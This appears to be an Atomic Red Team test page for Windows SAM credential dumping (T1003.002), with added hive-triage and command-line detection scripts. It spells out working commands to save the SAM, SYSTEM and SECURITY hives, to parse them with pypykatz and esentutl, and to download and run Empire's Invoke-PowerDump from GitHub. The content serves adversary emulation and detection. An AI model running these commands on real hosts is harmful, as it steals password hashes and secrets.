T1003.002 - Security Account Manager

Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database, either through in-memory techniques or through the Windows Registry, where the SAM database is stored. The SAM is a database file that contains the host's local accounts, typically those listed by the net user command. Reading the SAM keys directly requires SYSTEM-level access; the reg save method below works from an elevated (administrator) prompt because reg.exe uses SeBackupPrivilege to read the locked hive.

A number of tools can be used to retrieve the SAM contents through in-memory techniques.

Alternatively, the SAM (and the SYSTEM hive, which holds the boot key needed to decrypt it) can be extracted from the Registry with Reg:

  • reg save HKLM\sam sam
  • reg save HKLM\system system

Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)

Notes:

  • RID 500 account is the local, built-in administrator.
  • RID 501 is the guest account.
  • User accounts start with a RID of 1,000+.

Atomic Tests


Atomic Test #1 - Registry dump of SAM, creds, and secrets

The local SAM (SAM & SYSTEM hives), cached domain credentials (SYSTEM & SECURITY) and LSA secrets (SYSTEM & SECURITY) can be dumped by saving three registry hives, HKLM\SAM, HKLM\SYSTEM and HKLM\SECURITY, which are then processed locally using https://github.com/Neohapsis/creddump7.

Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security

Cleanup Commands:

del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
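The three files this test leaves in %temp% are raw registry hive files, so a responder who finds a stray `sam`/`system`/`security` in a temp directory can confirm what they are before handing them to creddump7. The Python below is an added example, not Atomic Red Team's code: it reads only the REGF base block at the start of a hive file (signature, sequence numbers, version, embedded name and the header checksum) using the documented base-block layout. The header produced by `build_sample()` is constructed for this example and does not come from a real system; `triage()` is a hypothetical helper that applies the same parse to a file on disk.

```python
"""Triage the files that `reg save` leaves behind (e.g. %temp%\sam, system, security).

Added example, not Atomic Red Team code. It reads only the REGF base block
at the start of a hive file; the offsets are the documented base-block layout.
The header built by build_sample() is constructed for this example and does
not come from a real system.
"""
import struct

BASE_BLOCK_LEN = 0x200          # bytes covered by the header checksum
NAME_OFF, NAME_LEN = 0x30, 64   # embedded hive file name, UTF-16LE, NUL padded
CHECKSUM_OFF = 0x1FC


def regf_checksum(block):
    """XOR of the 127 little-endian DWORDs that precede the checksum field."""
    x = 0
    for (dword,) in struct.iter_unpack("<I", block[:CHECKSUM_OFF]):
        x ^= dword
    if x == 0xFFFFFFFF:   # the two reserved results are never written as-is
        x = 0xFFFFFFFE
    elif x == 0:
        x = 1
    return x


def is_hive(block):
    """Cheap first check for a suspected dump: signature plus a full base block."""
    return len(block) >= BASE_BLOCK_LEN and block[:4] == b"regf"


def parse_regf(block):
    """Return the base-block fields a responder cares about; raise on non-hive input."""
    if not is_hive(block):
        raise ValueError("not a registry hive (missing 'regf' signature or truncated header)")
    seq1, seq2 = struct.unpack_from("<II", block, 0x04)
    major, minor, file_type = struct.unpack_from("<III", block, 0x14)
    name = block[NAME_OFF:NAME_OFF + NAME_LEN].decode("utf-16-le").rstrip("\x00")
    stored = struct.unpack_from("<I", block, CHECKSUM_OFF)[0]
    return {
        "name": name,
        "version": "%d.%d" % (major, minor),
        "primary_file": file_type == 0,        # 0 = primary hive file, not a .LOG transaction log
        "dirty": seq1 != seq2,                 # sequence numbers differ when a write was in flight
        "checksum_ok": stored == regf_checksum(block),
    }


def build_sample(name, seq1=7, seq2=7, corrupt=False):
    """Construct a minimal valid base block (test data only, not a real hive)."""
    hdr = bytearray(BASE_BLOCK_LEN)
    hdr[0:4] = b"regf"
    struct.pack_into("<II", hdr, 0x04, seq1, seq2)
    struct.pack_into("<III", hdr, 0x14, 1, 6, 0)   # major 1, minor 6, primary file
    struct.pack_into("<I", hdr, 0x20, 1)           # file format 1 (direct memory load)
    struct.pack_into("<I", hdr, 0x24, 0x20)        # root cell offset, the usual value
    encoded = name.encode("utf-16-le")[:NAME_LEN]
    hdr[NAME_OFF:NAME_OFF + len(encoded)] = encoded
    struct.pack_into("<I", hdr, CHECKSUM_OFF, regf_checksum(bytes(hdr)))
    if corrupt:
        hdr[0x100] ^= 0xFF   # damage a byte after the checksum was computed
    return bytes(hdr)


def triage(path):
    """Hypothetical helper: read the first base block of a file on disk and parse it."""
    with open(path, "rb") as fh:
        return parse_regf(fh.read(BASE_BLOCK_LEN))


if __name__ == "__main__":
    print(parse_regf(build_sample(r"\SystemRoot\System32\Config\SAM")))
```

A failed checksum or a mismatched pair of sequence numbers usually means the copy was truncated or taken while the hive was being written, which is worth knowing before blaming creddump7 for a parse failure.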


Atomic Test #2 - Registry parse with pypykatz

Parses registry hives to obtain stored credentials

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

pypykatz live registry

Dependencies: Run with powershell!

Description: Computer must have python 3 installed
Check Prereq Commands:
if (python --version) {exit 0} else {exit 1} 
Get Prereq Commands:
echo "Python 3 must be installed manually"
Description: Computer must have pip installed
Check Prereq Commands:
if (pip3 -V) {exit 0} else {exit 1} 
Get Prereq Commands:
echo "PIP must be installed manually"
Description: pypykatz must be installed and part of PATH
Check Prereq Commands:
if (cmd /c pypykatz -h) {exit 0} else {exit 1} 
Get Prereq Commands:
pip3 install pypykatz


Atomic Test #3 - esentutl.exe SAM copy

Copy the SAM hive using the esentutl.exe utility. The /vss switch reads the file through a Volume Shadow Copy, which is how it gets around the lock the OS holds on the in-use hive. The same technique can also be used to copy other files and hives, such as SYSTEM and NTUSER.dat.

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM |
| file_name | Name of the copied file | String | SAM |
| copy_dest | Destination of the copied file | String | %windir% |

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}


Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames

Executes a hashdump by reading the hashes from the registry.

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
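The four tests above reach the same three hives through different tooling (reg.exe, pypykatz, esentutl.exe and PowerDump), and all of them leave a recognisable command line behind. The Python below is an added example, not part of Atomic Red Team: a small detection pass over constructed process-creation events, with fields named as Sysmon Event ID 1 or Security 4688 (command-line auditing enabled) would present them, that flags the command lines each test produces. The rule names, the `normalize`/`classify`/`scan` helpers and every event in `SAMPLE_EVENTS` are assumptions of this example, not real telemetry.

```python
"""Flag process-creation events that look like SAM hive dumping (T1003.002).

Added example, not Atomic Red Team code. Input events are dicts with the
Image / CommandLine fields that Sysmon Event ID 1 or Security 4688 (with
command-line auditing enabled) would provide. Every event in SAMPLE_EVENTS
is constructed for this example; none is real telemetry.
"""
import re

# Hive names accepted after "reg save": short and long root-key forms, followed by a
# separator, a space or end of line, so "hklm\samba" does not fire but
# "hklm\sam\sam\domains\account" (a sub-key save that still yields hashes) does.
HIVE = r"(?:hklm|hkey_local_machine)[\\/]+(?:sam|system|security)(?=[\\/ ]|$)"
# On-disk hive copies, including GLOBALROOT shadow-copy paths that end in ...\config\SAM.
CONFIG_HIVE = r"[\\/]config[\\/](?:sam|system|security)(?= |$)"

RULES = [
    # Atomic Test #1 and the page's "reg save" method
    ("reg_save_hive", re.compile(r"(?:^|[\\/ ])reg(?:\.exe)? save " + HIVE)),
    # Atomic Test #3: esentutl.exe /y /vss <hive> /d <dest>, also via shadow-copy device paths
    ("esentutl_copy_hive", re.compile(r"(?:^|[\\/ ])esentutl(?:\.exe)? .*" + CONFIG_HIVE)),
    # Atomic Test #2
    ("pypykatz_live_registry", re.compile(r"pypykatz(?:\.exe)? live registry")),
    # Atomic Test #4
    ("powerdump", re.compile(r"invoke-powerdump|powerdump\.ps1")),
]

# Constructed sample events (not real logs). Comments mark the expected outcome.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\sam C:\Users\Public\sam"},                         # hit
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg.exe  SAVE  "HKEY_LOCAL_MACHINE\SYSTEM"  \\10.0.0.5\share\sys.hiv'},  # hit
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},  # benign
    {"Image": r"C:\Windows\System32\esentutl.exe",
     "CommandLine": r"esentutl.exe /y /vss C:\Windows\system32\config\SAM /d C:\Windows\SAM"},  # hit
    {"Image": r"C:\Windows\System32\esentutl.exe",
     "CommandLine": r"esentutl.exe /y \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM /d C:\ProgramData\sam"},  # hit
    {"Image": r"C:\Windows\System32\esentutl.exe",
     "CommandLine": r"esentutl /p C:\Windows\NTDS\ntds.dit"},                          # not a SAM hive
    {"Image": r"C:\Python39\Scripts\pypykatz.exe",
     "CommandLine": r"pypykatz live registry"},                                        # hit
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -c Import-Module $Env:Temp\PowerDump.ps1; Invoke-PowerDump"},  # hit
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},                    # benign
]


def normalize(cmdline):
    """Lower-case, drop quotes and collapse whitespace so quoting/spacing tricks do not evade."""
    cleaned = cmdline.replace('"', "").replace("'", "")
    return re.sub(r"\s+", " ", cleaned).strip().lower()


def classify(cmdline):
    """Return the names of every rule the command line matches (empty list if none)."""
    text = normalize(cmdline)
    return [name for name, rx in RULES if rx.search(text)]


def scan(events):
    """Run classify over a list of events; return (index, image, rule names) for hits only."""
    hits = []
    for i, ev in enumerate(events):
        names = classify(ev.get("CommandLine", ""))
        if names:
            hits.append((i, ev.get("Image", ""), names))
    return hits


if __name__ == "__main__":
    for idx, image, names in scan(SAMPLE_EVENTS):
        print("event %d: %s -> %s" % (idx, image, ", ".join(names)))
```

This only sees what lands in command-line telemetry: a tool that opens the hives through the registry API in memory leaves none of these strings, so pair it with object-access auditing on the SAM key (Security 4656/4663) and with file-creation telemetry for new files whose first four bytes are `regf` outside `%SystemRoot%\System32\config`.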